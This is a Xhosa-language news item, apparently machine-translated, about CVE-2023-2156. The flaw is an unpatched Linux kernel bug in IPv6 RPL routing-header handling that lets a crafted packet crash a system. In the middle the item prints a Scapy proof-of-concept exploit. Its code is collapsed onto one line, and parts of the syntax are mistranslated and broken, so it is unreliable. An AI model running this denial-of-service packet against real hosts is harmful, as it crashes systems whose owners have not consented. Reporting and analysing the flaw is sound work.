Iinkcukacha zobuthathaka obungapatshwanga (usuku olu-0) (CVE-2023-2156) kwi-kernel zichaziwe. Linux, evumela inkqubo ukuba imiswe ngokuthumela iipakethi ze-IPv6 ezenziwe ngokukodwa (ipakethi yokufa). Ingxaki yenzeka kuphela xa kuvulwa inkxaso yeRouting Protocol yeLow-Power kunye neLossy Networks (RPL), ekhutshazwa ngokungagqibekanga kulwabiwo kwaye isetyenziswa kakhulu kwizixhobo ezifakwe ngaphakathi ezisebenza kwiinethiwekhi ezingenazingcingo ezinokulahleka okukhulu kweepakethi.
Ukuba sesichengeni kubangelwa kukulungiswa okungachanekanga kwedatha yangaphandle kwikhowudi yokwahlulahlula iprotocol ye-RPL, ekhokelela ekungaphumeleli kwe-assert kunye ne-kernel ukuya kwimeko yoloyiko. Xa ubeka idatha efunyenweyo ekwahlulahluleni IPv6 RPL iheader yepakethe kwi-k_buff (Socket Buffer) isakhiwo, ukuba intsimi ye-CmprI imiselwe ku-15, intsimi ye-Segleft ukuya ku-1, kunye ne-CmprE ukuya ku-0, i-48-byte vector enedilesi iyancipha. ukuya kwi-528 bytes kwaye ibonakala imeko apho imemori eyabelwe isithinteli ayonelanga. Kule meko, umsebenzi we-skb_push, osetyenziselwa ukutyhala idatha kwisakhiwo, uhlola ukungenakulinganiswa phakathi kobukhulu bedatha kunye ne-buffer, ukuvelisa imeko yokwesaba ukukhusela ukubhala ngaphaya komda we-buffer.
Umzekelo wokuxhaphaza: # Siza kusebenzisa iScapy ukwenza ipakethi kwi-scapy.all import * import socket # Sebenzisa IPv6 kujongano lweLAN yakho DST_ADDR = sys.argv[1] SRC_ADDR = DST_ADDR # Sisebenzisa iisokethi ukuthumela ipakethe sockfd = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # Craft the packet # Type = 3 yenza le RPL ipakethe # Iidilesi zineedilesi ezi-3, kodwa ngenxa yokuba iCmprI ina-15, # i-octet nganye yeedilesi ezimbini zokuqala iphathwe njengedilesi ecinezelweyo # Segleft = 1 ukuqalisa i-amplification # lastentry = 0xf0 ibeka i-CmprI ukuya kwi-15 kunye ne-CmprE ukuya ku-0 p = IPv6(src=SRC_ADDR, dst=DST_ADDR) / IPv6ExtHdrSegmentRouting(uhlobo=3, iidilesi:= :", "a8::", "a7::"], segleft=6, lastentry=1xf0) # Thumela le pakethi ingendawo sockfd.sendto(bytes(p), (DST_ADDR, 0))
Kuyaphawuleka ukuba abaphuhlisi be-kernel baye baziswa malunga nokuba sesichengeni emva ngoJanuwari 2022 kwaye kwiinyanga ezili-15 ezidlulileyo baye bazama ukulungisa ingxaki kathathu, bekhupha iipetshi ngoSeptemba 2022, Oktobha 2022 kunye no-Aprili 2023, kodwa ixesha ngalinye ukulungiswa akwanelanga kwaye ukuba sesichengeni akukwazanga ukuphinda kuveliswe. Ekugqibeleni, iprojekthi ye-ZDI, elungelelanise umsebenzi wokulungisa ubuthathaka, yagqiba ekubeni ikhuphe ulwazi olucacileyo malunga nobuthathaka ngaphandle kokulinda ukulungiswa kokusebenza ukuba kufumaneke kwi-kernel.
Ngoko ke, ukuba sesichengeni kuhlala kungalungiswanga. Ngokukodwa, i-patch efakwe kwi-6.4-rc2 kernel ayisebenzi. Abasebenzisi bayacetyiswa ukuba bajonge ukuba iprotocol ye-RPL ayisetyenziswanga kwiinkqubo zabo, enokwenziwa kusetyenziswa umyalelo sysctl -a | grep -i rpl_seg_enabled
umthombo: opennet.ru
